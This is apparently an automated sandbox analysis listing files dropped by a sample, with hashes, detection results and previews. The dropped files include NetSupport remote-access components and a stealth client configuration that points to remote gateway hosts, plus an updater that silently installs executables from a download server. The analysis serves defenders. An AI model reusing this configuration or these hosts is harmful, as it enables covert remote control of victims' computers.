                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 22%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$U..`4..`4..`4..{.D.q4..{.p.54..iLI.e4..`4..74..{.q.}4..{.@.a4..{.G.a4..Rich`4..................PE..L......U.....................J.......!............@.......................... .......o....@....................................<.......T...............x)..............................................@...............@............................text............................... ..`.rdata...%.......&..................@..@.data....-..........................@....rsrc...T...........................@..@.reloc..p...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:Generic INItialization configuration [Features]
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6458
                                                                                                                                                                                                                                                                        Entropy (8bit):4.645519507940197
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                                                                                                                                                                                                        MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                                                                                                                                                                                                        SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                                                                                                                                                                                                        SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                                                                                                                                                                                                        SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):773968
                                                                                                                                                                                                                                                                        Entropy (8bit):6.901559811406837
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                                                                                                                                                                                                                        MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                                                                                                                                                                                                                        SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                                                                                                                                                                                                                        SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                                                                                                                                                                                                                        SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):632
                                                                                                                                                                                                                                                                        Entropy (8bit):5.401395695798581
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:w0Bhzd+mPfGS5J3lnxTPfY8o5kLXfDWQknmSunEulIB57JV:w0BhzEmPfn3lnx71cefDmBKKxj
                                                                                                                                                                                                                                                                        MD5:EED67C90F4165DD3B0C6AE9E9CCFF83F
                                                                                                                                                                                                                                                                        SHA1:A998D90CE3AF21F9BBF9D8D443E02E08237A303C
                                                                                                                                                                                                                                                                        SHA-256:5966287DF58A42C3BA525C17235BEF51FB3895683F1E6DECDDA02B82AA2AE174
                                                                                                                                                                                                                                                                        SHA-512:3772CFD4E307D5482AC3F22ACD8973448F264FAFD6152B23442FCD9148B43B57C1F9E9621634463A3E9C51CA357FCB733015060A95BA5A30B8C316D62EFA4E7A
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:0xd425def8....[Client].._present=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableDisconnect=1..DisableLocalInventory=1..DisableMessage=1..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=2,3..SecurityKey2=dgAAAN(8f7S2XEBDdNtm(K(AS7MA..SKMode=1..SysTray=0..Usernames=*..ValidAddresses.TCP=*....[_Info]..Filename=C:\ProgramData\regid.1993-06.com.microsoft\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]....[HTTP]..GatewayAddress=myptofgrtulo.info:1203..GSK=EN:I?NDB9L<PAGEM:C?FDH9P>ECOGF..Port=1203..SecondaryGateway=peweoklope.com:1203..SecondaryPort=1203..
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):328056
                                                                                                                                                                                                                                                                        Entropy (8bit):6.7547459359511395
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                                                                                                                                                                                                                        MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                                                                                                                                                                                                                        SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                                                                                                                                                                                                                        SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                                                                                                                                                                                                                        SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\e6adbd27df47824481105a18183e1d5e.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):195
                                                                                                                                                                                                                                                                        Entropy (8bit):4.924914741174998
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                                                                                                                                                                                                                        MD5:E9609072DE9C29DC1963BE208948BA44
                                                                                                                                                                                                                                                                        SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                                                                                                                                                                                                                        SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                                                                                                                                                                                                                        SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):33144
                                                                                                                                                                                                                                                                        Entropy (8bit):6.7376663312239256
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                                                                                                                                                                                                                        MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                                                                                                                                                                                                                        SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                                                                                                                                                                                                                        SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                                                                                                                                                                                                                        SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\ProgramData\333e0f034c7f41d48df4d6f9b3a5a54c$dpx$.tmp\f88670462385d642bd8a486306392759.tmp, Author: Joe Security
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+-..E~..E~..E~.\.~..E~.\.~..E~...~..E~..D~..E~.\.~..E~.\.~..E~.\.~..E~.\.~..E~...~..E~.\.~..E~Rich..E~........PE..L......U...........!.....2...........<.......P...............................`............@..........................^.......W..d....@..x............X..x)...P......`Q...............................V..@............P..@............................text....1.......2.................. ..`.rdata.......P.......6..............@..@.data...,....`.......F..............@....rsrc...x....@.......H..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                                                                                                                                                                                                                                        File Type:Windows setup INFormation
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                        Entropy (8bit):4.93007757242403
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                                                                                                                                                                                                                        MD5:26E28C01461F7E65C402BDF09923D435
                                                                                                                                                                                                                                                                        SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                                                                                                                                                                                                                        SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                                                                                                                                                                                                                        SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):920
                                                                                                                                                                                                                                                                        Entropy (8bit):5.4890290129298585
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:9GSJKKQ7+aLfSfLBoXSJwiFXfpaLfSfcB7:BMKC+aLKfLBbyiFXfpaLKfcB7
                                                                                                                                                                                                                                                                        MD5:509459CE0952B0856197848C14FA8DB6
                                                                                                                                                                                                                                                                        SHA1:925423CD81DFD5D1E385F72D7678887C93589B01
                                                                                                                                                                                                                                                                        SHA-256:5D9F04C032611A0FC5ED2E8B04B27C95D06AE5393BDE3A3503F8BB7DEF6454B6
                                                                                                                                                                                                                                                                        SHA-512:93D7CE10FBC92EE423CE45233F3F3614BA919C874DC52EF764776F8EE3068A1553B6E457A8BAB07CC01B0B5DDF626AD2CE9D97660BD91EED71F127CFB89E792B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:;aiu;..[v114].Name = Windows Installer.NoGUICommandLineSwitch = /exenoui /qn.ProductVersion = 5.0.4.0.URL = https://dl.likeasurfer.com/updates/v114.exe.Size = 4900680.SHA256 = B0E0AC83D5090C359F84AF160AEBA9BB7317D6D64372E4DEE980C7DC23FEFE41.MD5 = 5dc644e00d9553fc167cb649087b8089.ServerFileName = v114.exe.Flags = SilentInstall|NoCache|Advertises.RegistryKey = HKUD\Software\AdvancedWindowsManager\Windows Installer\Version.Version = 5.0.4.0.AutoCloseApplication = [APPDIR]AdvancedWindowsManager.exe..[v113].Name = Windows Installer.NoGUICommandLineSwitch = /exenoui /qn.ProductVersion = 5.0.3.0.URL = https://dl.likeasurfer.com/updates/v113.exe.Size = 3635424.MD5 = 8cad036c5cfed94d5319a060c488e38f.ServerFileName = v113.exe.Flags = SilentInstall|NoCache|Advertises.RegistryKey = HKUD\Software\AdvancedWindowsManager\Windows Installer\Version.Version = 5.0.3.0.AutoCloseApplication = [APPDIR]AdvancedWindowsManager.exe.
                                                                                                                                                                                                                                                                        Process:C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):3635424
                                                                                                                                                                                                                                                                        Entropy (8bit):7.194637165266501
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:98304:KKC4/jxH8S506fsWCDIOX3LFiU+3xOfXLBnkGK+NXZi:L/jxH8SCixOPLBuG
                                                                                                                                                                                                                                                                        MD5:8CAD036C5CFED94D5319A060C488E38F
                                                                                                                                                                                                                                                                        SHA1:731455086204F014C97EA3C1483DD6029961FF27
                                                                                                                                                                                                                                                                        SHA-256:62F773773392C101F673A8D3DB805D5AA3A45DBBB12E2B32BC746470AC520B0F
                                                                                                                                                                                                                                                                        SHA-512:5E673DE5820EBD47238AD83F4D98AC5CFC5D6AE5FA4941E24FB38C98F84CB852A3B38DEB1E4E2243099FBDB0CFD646D1AD3CCEB4E1380636A94CDED62DC473A2
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 27%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-...-...-......-..(.j.-...)...-.......-...(...-..)...-..,...-..*...-...,...-...$...-......-.....-.../...-.Rich..-.................PE..L...<.\`.........."......l...B......H-............@........................... ......88...@..................................L..(........{..........h\7.x....P..........p...................@.......x...@...................p#..@....................text...?j.......l.................. ..`.rdata..8............p..............@..@.data...@n...`...T...N..............@....rsrc....{.......|..................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\Temp\ce2d31339cfff41b4b6db9e32e93218c\Windows Updater.exe
                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4900680
                                                                                                                                                                                                                                                                        Entropy (8bit):7.143984295613241
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:98304:TYoIz3Q2HM5Qp4WzMIaX8/BG6v/IcV6V5LtYPPcsmVC:Ti3QDCpQaJGAI5aPPcRC
                                                                                                                                                                                                                                                                        MD5:5DC644E00D9553FC167CB649087B8089
                                                                                                                                                                                                                                                                        SHA1:753BB09D7A96622B76438017A7E413D45E6F66FA
                                                                                                                                                                                                                                                                        SHA-256:B0E0AC83D5090C359F84AF160AEBA9BB7317D6D64372E4DEE980C7DC23FEFE41
                                                                                                                                                                                                                                                                        SHA-512:CE9260F5F8F3E77A046F137DD0416D990FBADEE85D53005114696C8DCC34191E396A45E88977DD11EE87FE6E37A65E030F0B805B452F210C7E68DE1EFE92C954
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 59%
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............S...S...SA..R...SA..R+..SA..R...S...R...S...R...S...R...SA..R...SA..R...SA..R...S...SO..S...R..S..=S...S..US...S...R...SRich...S................PE..L...G.gb..........".......!.........D.........!...@.........................../......*K...@.................................$.*.(.....*.............J.x.....-..[....$.p.....................$.......!.@.............!.......).`....................text.....!.......!................. ..`.rdata..di....!..j....!.............@..@.data.......0*..j....*.............@....rsrc........*.......*.............@..@.reloc...[....-..\...D-.............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                                                        Entropy (8bit):4.0081320258334
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1EyEMyvn:1BEN
                                                                                                                                                                                                                                                                        MD5:6BC190DD42A169DFA14515484427FC8E
                                                                                                                                                                                                                                                                        SHA1:B53BD614A834416E4A20292AA291A6D2FC221A5E
                                                                                                                                                                                                                                                                        SHA-256:B3395B660EB1EDB00FF91ECE4596E3ABE99FA558B149200F50AABF2CB77F5087
                                                                                                                                                                                                                                                                        SHA-512:5B7011ED628B673217695809A38A800E9C8A42CEB0C54AB6F8BC39DBA0745297A4FBD66D6B09188FCC952C08217152844DFC3ADA7CF468C3AAFCEC379C0B16B6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[General]..Active = true..
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):13659
                                                                                                                                                                                                                                                                        Entropy (8bit):5.427218727765739
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:294e4g7r34IG4PD4Ir4Mu4g40rN4H74ik074kdx4xq4P04Q041nk4IOk44pT4qnt:2bHagRkSoFm2SLufNRtX
                                                                                                                                                                                                                                                                        MD5:5DD6102606EBD978A563960E309C221E
                                                                                                                                                                                                                                                                        SHA1:419045F3BD9DCD018913D0F12DA952830CCF2789
                                                                                                                                                                                                                                                                        SHA-256:16D69F2EDA0258A35BBC8A384A7C603C344E6F1510752119FF8CF89D5DCEE111
                                                                                                                                                                                                                                                                        SHA-512:30A8E427ADFCC4C739AA21891133A4C3CA3D248D81FA5CEA56A984C05A0B7F33CD7CB57292ECEF163C7B1B03B72132969523299B85B7595A1D23113F4132F2DF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[Hit {9F5B7133-C9E3-4DC8-B9D9-D1C1EE62B1ED}]..Queue Time = 16..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 57adf5f3482b9a503e2bed2b..Application Version = 5.0.3..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {8012E704-06BF-437A-86D5-0E2BF53D9C1F}....[Hit {9CD34C52-A80B-4857-ADCC-9A06417E39A3}]..Queue Time = 0..Hit Type = property..Label = VersionNT..Value = 1000..Protocol Version = 3..Application ID = 57adf5f3482b9a503e2bed2b..Application Version = 5.0.3..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {8012E704-06BF-437A-86D5-0E2BF53D9C1F}....[Hit {001A9656-C67C-4B85-BF4D-21C112734BC3}]..Queue Time = 0..Hit Type = property..Label = VersionNT64..Value = 1000..Protocol Version = 3..Application ID = 57adf5f3482b9a503e2bed2b..Application Version = 5.0.3..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {8012E704-06BF-437A-86D5-0E2BF53D9C1F}....[Hit {C72E773D-E4AC-4571-AD89-A9084743D302}]..Queu
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                                                        Entropy (8bit):4.0081320258334
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1EyEMyvn:1BEN
                                                                                                                                                                                                                                                                        MD5:6BC190DD42A169DFA14515484427FC8E
                                                                                                                                                                                                                                                                        SHA1:B53BD614A834416E4A20292AA291A6D2FC221A5E
                                                                                                                                                                                                                                                                        SHA-256:B3395B660EB1EDB00FF91ECE4596E3ABE99FA558B149200F50AABF2CB77F5087
                                                                                                                                                                                                                                                                        SHA-512:5B7011ED628B673217695809A38A800E9C8A42CEB0C54AB6F8BC39DBA0745297A4FBD66D6B09188FCC952C08217152844DFC3ADA7CF468C3AAFCEC379C0B16B6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[General]..Active = true..
                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):955
                                                                                                                                                                                                                                                                        Entropy (8bit):5.3063424878537395
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:24:5NxAiXRsE/jwyvEyiqjXRsE/jwbxMxlqeXRsE/jwt:5NHCQxjCayeCt
                                                                                                                                                                                                                                                                        MD5:DF812B13F87A8BE21F360FA519B1D089
                                                                                                                                                                                                                                                                        SHA1:D584F1A136F97ACE0D0B80797B1CE0C66A237148
                                                                                                                                                                                                                                                                        SHA-256:4301C4340F8F6658DEF70E5984A3FE7E1C40E51BEB34F45033D21907E5BBE0B9
                                                                                                                                                                                                                                                                        SHA-512:E98B671BAED1BA214C941F1CEF112E7BF95C3E069E4925619F3FC2B4DE1C6DF77DA3055433B376F214F3CFACC73D6F96F8DF64BA3A35940D9A9D36F8E963D31D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[Hit {B2BC6A6D-0ECB-4EBE-AE39-39E286DBBC6A}]..Queue Time = 16..Hit Type = lifecycle..Life control = start..Protocol Version = 3..Application ID = 57bec79515c1ec525f8858bf..Application Version = 1.0.0..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {3D43209A-0F28-4542-B7EC-E1730F55EEC8}....[Hit {6E7C9C21-9814-432D-86AC-A838F58C871A}]..Queue Time = 0..Hit Type = installtype..Value = uninstallbyupgrade..Protocol Version = 3..Application ID = 57bec79515c1ec525f8858bf..Application Version = 1.0.0..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {3D43209A-0F28-4542-B7EC-E1730F55EEC8}....[Hit {418ACBFE-FE82-4FA5-8B27-2C298276DF03}]..Queue Time = 0..Hit Type = lifecycle..Life control = end..Life status = success..Protocol Version = 3..Application ID = 57bec79515c1ec525f8858bf..Application Version = 1.0.0..Client ID = 57F1AB8929FE72B9ED79F4590C98B27D4C06FB8D..Session ID = {3D43209A-0F28-4542-B7EC-E1730F55EEC8}..
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                                                                        Entropy (8bit):4.0081320258334
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:1EyEMyvn:1BEN
                                                                                                                                                                                                                                                                        MD5:6BC190DD42A169DFA14515484427FC8E
                                                                                                                                                                                                                                                                        SHA1:B53BD614A834416E4A20292AA291A6D2FC221A5E
                                                                                                                                                                                                                                                                        SHA-256:B3395B660EB1EDB00FF91ECE4596E3ABE99FA558B149200F50AABF2CB77F5087
                                                                                                                                                                                                                                                                        SHA-512:5B7011ED628B673217695809A38A800E9C8A42CEB0C54AB6F8BC39DBA0745297A4FBD66D6B09188FCC952C08217152844DFC3ADA7CF468C3AAFCEC379C0B16B6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:[General]..Active = true..
                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-53US7.tmp\a1.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                        Entropy (8bit):5.266742894847657
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:N0iUWWVrFsVnFCDjfpvgGDqGSbN7/F6Ss5dcb7Xjj3R522ANKFkAG:eiURVrWVFAjKGeGSbJkSsEfXjTOns9G
                                                                                                                                                                                                                                                                        MD5:21D2D12E9972CE9E5F21DEA6E1FB8331
                                                                                                                                                                                                                                                                        SHA1:FFCBF733022D25F3A98993D695856F54D41A6A39
                                                                                                                                                                                                                                                                        SHA-256:54CC0F8C7771FE73C249075BAC00FD8D06DEF6842A7917331775E29442B4FC48
                                                                                                                                                                                                                                                                        SHA-512:C005848EE25D3CA4AF3FFB2E0356A16CCEC78C6B403049CF752344483376C6E85F21AE45EA3F56BA194235877668A4B47A0419C0D7DC45E1E421904B81ECD1DF
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
